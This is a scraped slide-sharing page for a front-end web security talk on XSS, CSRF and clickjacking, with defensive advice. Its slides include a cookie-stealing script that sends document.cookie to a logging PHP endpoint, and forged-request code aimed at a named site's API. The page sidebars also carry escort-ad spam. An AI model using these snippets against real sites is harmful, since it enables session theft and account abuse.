Suche senden
Hochladen
F2e security
•
19 gefällt mir
•
1,429 views
jay li
Folgen
Technologie
Design
Melden
Teilen
Melden
Teilen
1 von 60
Jetzt herunterladen
Downloaden Sie, um offline zu lesen
Empfohlen
Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境
Yuriko IKEDA
スマートフォン勉強会@関東 #11 LT 5分で語る SQLite暗号化
スマートフォン勉強会@関東 #11 LT 5分で語る SQLite暗号化
Taro Matsuzawa
Solaris 11 base box for Vagrant using Packer
Solaris 11 base box for Vagrant using Packer
Alan Chalmers
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswift
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswift
Tomohiro Kumagai
JavaScript, Meet Cloud : Node.js on Windows Azure
JavaScript, Meet Cloud : Node.js on Windows Azure
Shiju Varghese
PHP Identity and Data Security
PHP Identity and Data Security
Jonathan LeBlanc
Node.js Authentication and Data Security
Node.js Authentication and Data Security
Jonathan LeBlanc
Secure Payments Over Mixed Communication Media
Secure Payments Over Mixed Communication Media
Jonathan LeBlanc
Empfohlen
Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境
Yuriko IKEDA
スマートフォン勉強会@関東 #11 LT 5分で語る SQLite暗号化
スマートフォン勉強会@関東 #11 LT 5分で語る SQLite暗号化
Taro Matsuzawa
Solaris 11 base box for Vagrant using Packer
Solaris 11 base box for Vagrant using Packer
Alan Chalmers
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswift
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswift
Tomohiro Kumagai
JavaScript, Meet Cloud : Node.js on Windows Azure
JavaScript, Meet Cloud : Node.js on Windows Azure
Shiju Varghese
PHP Identity and Data Security
PHP Identity and Data Security
Jonathan LeBlanc
Node.js Authentication and Data Security
Node.js Authentication and Data Security
Jonathan LeBlanc
Secure Payments Over Mixed Communication Media
Secure Payments Over Mixed Communication Media
Jonathan LeBlanc
Code retreat Codeception
Code retreat Codeception
Florent Batard
Elasticsearch for Pharo Smalltalk
Elasticsearch for Pharo Smalltalk
Sho Yoshida
Introduction to python
Introduction to python
Hyun-hwan Jeong
Islam House
Islam House
Haris Padinharethil
Keep It Simple Security (Symfony cafe 28-01-2016)
Keep It Simple Security (Symfony cafe 28-01-2016)
Oleg Zinchenko
Environments line-up! Vagrant & Puppet 101
Environments line-up! Vagrant & Puppet 101
jelrikvh
001
001
bwtvcf
PuppetCamp SEA 1 - Version Control with Puppet
PuppetCamp SEA 1 - Version Control with Puppet
Walter Heck
ReactJS & Material-ui Hello world
ReactJS & Material-ui Hello world
Daniel Lim
Год в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участия
defcon_kz
Django osc2018-okinawa
Django osc2018-okinawa
Xoxzo Inc.
Banquet 05
Banquet 05
Koubei UED
JavaScript Engine
JavaScript Engine
jay li
卫银霞 -统计数字会撒谎
卫银霞 -统计数字会撒谎
jay li
Jswebapps
Jswebapps
jay li
中国元素在设计中的应用 -如瑟
中国元素在设计中的应用 -如瑟
jay li
Responsive Web UI Design
Responsive Web UI Design
jay li
淘宝前端技术巡礼
淘宝前端技术巡礼
jay li
犀牛书第六版
犀牛书第六版
jay li
淘宝移动端Web开发最佳实践
淘宝移动端Web开发最佳实践
jay li
潜力无限的编程语言Javascript
潜力无限的编程语言Javascript
jay li
深入剖析浏览器
深入剖析浏览器
jay li
Weitere ähnliche Inhalte
Was ist angesagt?
Code retreat Codeception
Code retreat Codeception
Florent Batard
Elasticsearch for Pharo Smalltalk
Elasticsearch for Pharo Smalltalk
Sho Yoshida
Introduction to python
Introduction to python
Hyun-hwan Jeong
Islam House
Islam House
Haris Padinharethil
Keep It Simple Security (Symfony cafe 28-01-2016)
Keep It Simple Security (Symfony cafe 28-01-2016)
Oleg Zinchenko
Environments line-up! Vagrant & Puppet 101
Environments line-up! Vagrant & Puppet 101
jelrikvh
001
001
bwtvcf
PuppetCamp SEA 1 - Version Control with Puppet
PuppetCamp SEA 1 - Version Control with Puppet
Walter Heck
ReactJS & Material-ui Hello world
ReactJS & Material-ui Hello world
Daniel Lim
Год в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участия
defcon_kz
Django osc2018-okinawa
Django osc2018-okinawa
Xoxzo Inc.
Banquet 05
Banquet 05
Koubei UED
Was ist angesagt?
(12)
Code retreat Codeception
Code retreat Codeception
Elasticsearch for Pharo Smalltalk
Elasticsearch for Pharo Smalltalk
Introduction to python
Introduction to python
Islam House
Islam House
Keep It Simple Security (Symfony cafe 28-01-2016)
Keep It Simple Security (Symfony cafe 28-01-2016)
Environments line-up! Vagrant & Puppet 101
Environments line-up! Vagrant & Puppet 101
001
001
PuppetCamp SEA 1 - Version Control with Puppet
PuppetCamp SEA 1 - Version Control with Puppet
ReactJS & Material-ui Hello world
ReactJS & Material-ui Hello world
Год в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участия
Django osc2018-okinawa
Django osc2018-okinawa
Banquet 05
Banquet 05
Andere mochten auch
JavaScript Engine
JavaScript Engine
jay li
卫银霞 -统计数字会撒谎
卫银霞 -统计数字会撒谎
jay li
Jswebapps
Jswebapps
jay li
中国元素在设计中的应用 -如瑟
中国元素在设计中的应用 -如瑟
jay li
Responsive Web UI Design
Responsive Web UI Design
jay li
淘宝前端技术巡礼
淘宝前端技术巡礼
jay li
犀牛书第六版
犀牛书第六版
jay li
淘宝移动端Web开发最佳实践
淘宝移动端Web开发最佳实践
jay li
潜力无限的编程语言Javascript
潜力无限的编程语言Javascript
jay li
深入剖析浏览器
深入剖析浏览器
jay li
编码大全 拔赤
编码大全 拔赤
jay li
HTML/CSS/JS基础
HTML/CSS/JS基础
jay li
Andere mochten auch
(12)
JavaScript Engine
JavaScript Engine
卫银霞 -统计数字会撒谎
卫银霞 -统计数字会撒谎
Jswebapps
Jswebapps
中国元素在设计中的应用 -如瑟
中国元素在设计中的应用 -如瑟
Responsive Web UI Design
Responsive Web UI Design
淘宝前端技术巡礼
淘宝前端技术巡礼
犀牛书第六版
犀牛书第六版
淘宝移动端Web开发最佳实践
淘宝移动端Web开发最佳实践
潜力无限的编程语言Javascript
潜力无限的编程语言Javascript
深入剖析浏览器
深入剖析浏览器
编码大全 拔赤
编码大全 拔赤
HTML/CSS/JS基础
HTML/CSS/JS基础
Ähnlich wie F2e security
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
robertjd
REST, Web Sockets, Server-sent Events
REST, Web Sockets, Server-sent Events
Ivano Malavolta
Apache mod authまわりとか
Apache mod authまわりとか
Toshiyuki Terashita
Selenium再入門
Selenium再入門
Norio Suzuki
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Alexandre Morgaut
スマートフォンサイトの作成術 - 大川洋一
スマートフォンサイトの作成術 - 大川洋一
okyawa
Node worshop Realtime - Socket.io
Node worshop Realtime - Socket.io
Caesar Chi
Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicated
Octavio Paguaga
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Krzysztof Kotowicz
ニコニコ動画を検索可能にしてみよう
ニコニコ動画を検索可能にしてみよう
genta kaneyama
Web security and OWASP
Web security and OWASP
Isuru Samaraweera
Cryptography 101 for Java Developers - JavaZone2019
Cryptography 101 for Java Developers - JavaZone2019
Michel Schudel
Spring4 security
Spring4 security
Sang Shin
플렉스팀 프론트엔드 기술 스택의 이해: `lint`, `build`, `run`
플렉스팀 프론트엔드 기술 스택의 이해: `lint`, `build`, `run`
Heejong Ahn
Security Testing - Where Automation Fails
Security Testing - Where Automation Fails
Christiaan Ottow
PHP記帳網頁教材(第一頁是空白的)
PHP記帳網頁教材(第一頁是空白的)
TaiShunHuang
The top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
Web Application Penetration Testing - 101
Web Application Penetration Testing - 101
Andrea Hauser
Web sec-淺談
Web sec-淺談
Jyny Chen
Integration Test Cucumber + Webrat + Selenium
Integration Test Cucumber + Webrat + Selenium
tka
Ähnlich wie F2e security
(20)
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
REST, Web Sockets, Server-sent Events
REST, Web Sockets, Server-sent Events
Apache mod authまわりとか
Apache mod authまわりとか
Selenium再入門
Selenium再入門
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
スマートフォンサイトの作成術 - 大川洋一
スマートフォンサイトの作成術 - 大川洋一
Node worshop Realtime - Socket.io
Node worshop Realtime - Socket.io
Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicated
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
ニコニコ動画を検索可能にしてみよう
ニコニコ動画を検索可能にしてみよう
Web security and OWASP
Web security and OWASP
Cryptography 101 for Java Developers - JavaZone2019
Cryptography 101 for Java Developers - JavaZone2019
Spring4 security
Spring4 security
플렉스팀 프론트엔드 기술 스택의 이해: `lint`, `build`, `run`
플렉스팀 프론트엔드 기술 스택의 이해: `lint`, `build`, `run`
Security Testing - Where Automation Fails
Security Testing - Where Automation Fails
PHP記帳網頁教材(第一頁是空白的)
PHP記帳網頁教材(第一頁是空白的)
The top 10 security issues in web applications
The top 10 security issues in web applications
Web Application Penetration Testing - 101
Web Application Penetration Testing - 101
Web sec-淺談
Web sec-淺談
Integration Test Cucumber + Webrat + Selenium
Integration Test Cucumber + Webrat + Selenium
Mehr von jay li
小控件、大学问
小控件、大学问
jay li
Mobile UI design and Developer
Mobile UI design and Developer
jay li
Javascript autoload
Javascript autoload
jay li
Html5form
Html5form
jay li
Slide
Slide
jay li
Js doc toolkit
Js doc toolkit
jay li
新业务新员工培训 Banner设计
新业务新员工培训 Banner设计
jay li
夏之 专题设计
夏之 专题设计
jay li
赤骥 用户研究入门
赤骥 用户研究入门
jay li
Ecmascript
Ecmascript
jay li
2011彩票首页开发实践
2011彩票首页开发实践
jay li
Web设计的画纸深入了解我们的显示器
Web设计的画纸深入了解我们的显示器
jay li
潜意识设计
潜意识设计
jay li
Html&css培训 舒克
Html&css培训 舒克
jay li
Html5@taobao
Html5@taobao
jay li
前端调试工具,编码相关,性能相关
前端调试工具,编码相关,性能相关
jay li
Browser Object Model
Browser Object Model
jay li
box model
box model
jay li
Mehr von jay li
(18)
小控件、大学问
小控件、大学问
Mobile UI design and Developer
Mobile UI design and Developer
Javascript autoload
Javascript autoload
Html5form
Html5form
Slide
Slide
Js doc toolkit
Js doc toolkit
新业务新员工培训 Banner设计
新业务新员工培训 Banner设计
夏之 专题设计
夏之 专题设计
赤骥 用户研究入门
赤骥 用户研究入门
Ecmascript
Ecmascript
2011彩票首页开发实践
2011彩票首页开发实践
Web设计的画纸深入了解我们的显示器
Web设计的画纸深入了解我们的显示器
潜意识设计
潜意识设计
Html&css培训 舒克
Html&css培训 舒克
Html5@taobao
Html5@taobao
前端调试工具,编码相关,性能相关
前端调试工具,编码相关,性能相关
Browser Object Model
Browser Object Model
box model
box model
Kürzlich hochgeladen
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Delhi Call girls
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Katpro Technologies
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
Allon Mureinik
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
hans926745
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
Paola De la Torre
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
gurkirankumar98700
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Gabriella Davis
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
naman860154
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
wesley chun
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Roshan Dwivedi
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
Kürzlich hochgeladen
(20)
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
F2e security
1.
2.
2
3.
3
4.
4
5.
•
– – – • •
6.
7.
8.
9.
Cross-site scripting
XSS
10.
XSS
11.
•
Cookie • DOM • •…
12.
Yupoo
XSS
13.
14.
alert
15.
Javascript var img =
new Image(); img.src = 'get_cookie.php?var='+encodeURI(document.cookie); PHP <?php if (isset($_GET['var'])) { file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var'])); }
16.
“
”
17.
18.
19.
• Filter input,Escape
output • Cookie • noscript?
20.
21.
22.
• •
23.
• http://en.wikipedia.org/wiki/Cross-site_scripting • http://www.gracecode.com/archives/2517 •
http://www.gracecode.com/archives/2491 • http://ha.ckers.org/xss.html • http://www.xssed.com/
24.
25.
CSRF Cross Site
Request Forgery
26.
27.
<img src=“http://.../del.php?id=64” />
28.
29.
30.
31.
32.
<form action="http://jiwai.de/wo/status/update"
method="post"> <textarea name="jw_status"></textarea> <input type="submit" /> </form>
33.
• •
GET POST •
34.
setInterval(function() {
var img = new Image(); var message = ' '; var api = 'http://jiwai.de/wo/status/ update'; img.src = api + '?jw_status=' + message + '&t=' + +new Date(); }, 1000);
35.
“
”
36.
37.
38.
39.
40.
41.
•
GET POST Cookie • Referer • Token •
42.
•
_tb_token_ • Referer
43.
• http://en.wikipedia.org/wiki/Cross-site_request_forgery • http://www.cgisecurity.com/csrf-faq.html •
http://www.80sec.com/csrf-securit.html • http://www.playhack.net/view.php?id=31
44.
45.
46.
Twitter
Clickjacking
47.
1.
iframe Twitter 0 2. “ ” 3. Twitter
48.
49.
• •
50.
51.
52.
53.
CSRF
54.
55.
Cookie Session
56.
•
“JS ” • •
57.
58.
Q&A
59.
60.
'alert(/tHx/)'.replace(/.+/, eval);
Jetzt herunterladen